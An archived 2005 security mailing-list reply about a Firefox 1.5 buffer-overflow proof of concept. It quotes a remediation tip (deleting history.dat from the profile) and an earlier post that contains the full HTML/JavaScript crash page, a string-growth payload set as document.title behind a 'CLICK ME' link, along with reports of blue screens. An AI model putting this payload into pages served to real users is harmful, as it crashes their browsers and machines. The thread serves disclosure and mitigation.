[<prev] [next>] [day] [month] [year] [list]
Message-ID: <18564343.1134233105027.JavaMail.juha-matti.laurio@netti.fi>
Date: Sat Dec 10 16:45:11 2005
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Subject: Firefox 1.5 buffer overflow (poc) - more
buffer
Thanks for sharing the profile location information to prevent crash at
the next browser start.
In fact, this was covered at Internet Storm Center earlier on Friday morning:
http://isc.sans.org/diary.php?storyid=920
- Juha-Matti
(Time to shorten long replies..)
--clip--
>
> tip: only erasing \Documents and
> Settings\Administrador.COMP-NAME\Dados de
> aplicativos\Mozilla\Firefox\Profiles\history.dat
>
> your firefox will start without crash your machine (blue screen) every
> time you load it...
>
> t+
>
> 2005/12/9, F?sforo <fosforo@...il.com>:
> > It works here.
> >
> > seems it depends on how much ram you've. i got 2 blue screens, after
> > changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> > the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> > without user interaction, the second one i just've opened firefox, not
> > the bug file (maybe cache ?)
> >
> > ps: i've 1Gb of ram
> >
> > <html><head><title>heh</title><script type="text/javascript">
> > function ex() {
> > var buffer = "";
> > for (var i = 0; i < 5000; i++) {
> > buffer += "A";
> > }
> > var buffer2 = buffer;
> > var buffer3 = buffer2;
> > for (i = 0; i < 500; i++) {
> > buffer2 += buffer;
> > for (i = 0; i < 500; i++) {
> > buffer3 += buffer2;
> > }
> > }
> > document.title = buffer2;
> > }
> > </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> > </a></body></html>
> >
Powered by blists - more mailing lists